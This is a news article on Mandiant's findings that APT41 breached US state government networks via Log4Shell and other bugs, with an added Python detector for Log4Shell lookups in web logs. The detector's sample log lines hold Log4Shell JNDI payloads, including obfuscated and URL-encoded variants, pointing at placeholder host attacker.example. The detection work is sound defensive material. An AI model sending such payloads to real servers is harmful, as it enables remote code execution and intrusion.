Security researchers have exposed a major new campaign by Chinese state hackers in which they exploited Log4Shell and other bugs to compromise at least six US state government networks.
Mandiant said the activity, observed between May 2021 and February 2022, indicated a deliberate campaign. However, it could not say definitively whether the prolific group known as APT41 was conducting operations for the state or moonlighting for its own gain.
What it did reveal were “significant new capabilities,” including new attack vectors and post-compromise tools and techniques.
The group targeted vulnerable internet-facing web applications for initial access, typically via .NET deserialization attacks and SQL injection and directory traversal vulnerabilities.
APT41 combined zero-day attacks, in this case to compromise the off-the-shelf application USAHerds, with exploits of known bugs such as Log4Shell.
In the case of the latter, the group was reported to be exploiting Log4j “within hours” of the Apache Foundation’s advisory to compromise at least two US state governments as well as more traditional targets in the insurance and telecoms industries.
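The Log4Shell exploitation described above leaves a recognisable trace in web-server logs: a `${jndi:...}` lookup string in a request header or parameter, often wrapped in nested lookups such as `${lower:j}` or `${::-j}` so that a naive search for the word "jndi" misses it. The following detector is an added example written for this page (it is not code from Mandiant or from the article's source); the access-log lines, IP addresses and the `attacker.example` hostname are constructed placeholders, and the normalisation only models the default-value and lower/upper lookups rather than the full Log4j lookup grammar.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample web-server access log (combined format). The first line is
# benign; the other three carry Log4Shell-style JNDI lookups in the User-Agent
# or query string, in plain, nested-lookup and URL-encoded forms. Hostnames and
# addresses are placeholders, not indicators from the article.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 1532 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET /?x=${${lower:j}ndi:${lower:ldap}://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:25 +0000] "GET / HTTP/1.1" 200 1532 "-" "%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D"',
]

# ${<anything>:-<default>} -> <default>, e.g. ${::-j} or ${env:NOPE:-j} -> j
_DEFAULT_RE = re.compile(r"\$\{[^{}$]*:-([^{}$]*)\}")
# ${lower:X} / ${upper:X} -> x / X
_CASE_RE = re.compile(r"\$\{(lower|upper):([^{}$]*)\}", re.IGNORECASE)
# A resolved JNDI lookup, e.g. ${jndi:ldap://host/path}
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def url_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize_lookups(s: str, max_rounds: int = 10) -> str:
    """Best-effort collapse of the nested lookups used to hide the string 'jndi'
    from naive pattern matching. Innermost lookups are resolved first, round by
    round, mirroring how Log4j evaluates nesting. Only the default-value and
    lower/upper lookups are modelled; this is not a full Log4j lookup interpreter."""
    for _ in range(max_rounds):
        before = s
        s = _DEFAULT_RE.sub(lambda m: m.group(1), s)
        s = _CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            s,
        )
        if s == before:
            break
    return s


def find_jndi_lookups(line: str) -> List[str]:
    """Return every JNDI lookup found in a log line after decoding and normalisation."""
    return _JNDI_RE.findall(normalize_lookups(url_decode(line)))


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Flag lines containing JNDI lookups; the source IP is the first log field."""
    findings = []
    for line in lines:
        hits = find_jndi_lookups(line)
        if hits:
            findings.append({"src": line.split(" ", 1)[0], "lookups": hits, "line": line})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['src']}: {finding['lookups']}")
```

Because the lookup is resolved wherever the vulnerable application logs attacker-controlled input, a real deployment would run this over every logged field (User-Agent, Referer, X-Forwarded-For, request bodies), not just the request line. Detection of this kind is a compensating control for triage and incident scoping; the fix remains upgrading Log4j to a patched release.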
In late February 2022, APT41 was even found to have re-compromised two previous US state government victims.
“APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability,” Mandiant concluded. “The group also demonstrates a willingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use.”
The group was also observed customizing malware to specific victim organizations’ environments, and it hid its command and control (C2) address in encoded data on tech community forums, which it frequently updated.
“While the ongoing crisis in Ukraine has rightfully captured the world’s attention and the potential for Russian cyber-threats is real, we must remember that other major threat actors around the world are continuing their operations as usual,” argued Mandiant principal threat analyst Geoff Ackerman.
“We can’t allow other cyber activity to fall by the wayside, especially given our observations that this campaign from APT41, one of the most prolific threat actors around, continues to this day.”
Some parts of this article are sourced from:
www.infosecurity-journal.com